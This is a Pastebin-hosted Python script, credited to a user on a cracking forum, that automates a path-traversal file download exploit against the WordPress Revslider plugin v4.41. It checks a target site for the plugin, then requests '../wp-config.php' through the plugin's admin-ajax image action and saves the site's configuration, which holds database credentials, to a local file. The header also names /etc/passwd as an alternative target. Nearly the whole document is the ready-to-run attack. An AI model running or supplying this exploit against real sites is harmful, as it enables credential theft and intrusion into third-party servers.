Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # author: lubov
- '''
- Affected Software: Wordpress Plugin: Revslider v4.41
- Type of exploitation: Arbitrary File Download
- This script helps automate the exploitation of Wordpress plugin: Revslider in order
- to obtain the website's wordpress config (or) the server's /etc/passwd (if Linux).
- Source: https://www.exploit-db.com/exploits/36554/
- '''
- import requests, sys
- from urlparse import urlparse
- def logo():
- print '''\
- * *
- __ *
- ,db' * *
- ,d8/ * * *
- 888
- `db\ * *
- `o`_ **
- * * * _ *
- * / )
- * (\__/) * ( ( *
- ,-.,-.,) (.,-.,-.,-.) ).,-.,-.
- | @| ={ }= | @| / / | @|o |
- _j__j__j_) `-------/ /__j__j__j_
- ________( /___________
- | | @| \ || o|O | @|
- |o | |,'\ , ,'"| | | | hjw
- vV\|/vV|`-'\ ,---\ | \Vv\hjwVv\//v
- _) ) `. \ /
- (__/ ) )
- (_/
- Revslider Exploiter
- by: lubov (https://www.nulled.to/user/1242037-lubov)
- '''
- def usage():
- print("Usage: %s http(s)://vuln-url.com") % (sys.argv[0])
- quit()
- def filename_gen(f_host):
- f_host = urlparse(f_host)
- return f_host.netloc
- def write(f_name, content):
- with open(f_name+'.txt', 'wb') as f:
- for chunk in content.iter_content(chunk_size=128):
- f.write(chunk)
- f.close()
- def exploit(host):
- print("[+][+] Attempting to obtain wp-config from: %s") % (host)
- r = requests.get(host + '/wp-content/plugins/revslider')
- if r.status_code == requests.codes.ok:
- print("[+][+] The website is running the Revslider Plugin.")
- else:
- print("[-][-] The website is not running the plugin.")
- quit()
- x = requests.get(host+'/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php')
- return x
- def main():
- if (len(sys.argv) < 2):
- usage()
- url = sys.argv[1]
- try:
- if (url.split(":")[0]):
- pass
- except IndexError:
- print("[-][-] Missing URL Schema. (http/https).")
- quit()
- config = exploit(url)
- filename = filename_gen(url)
- write(filename, config)
- print("[+][+] Config has been successfully been written to %s.txt") % (filename)
- if __name__ == '__main__':
- logo()
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement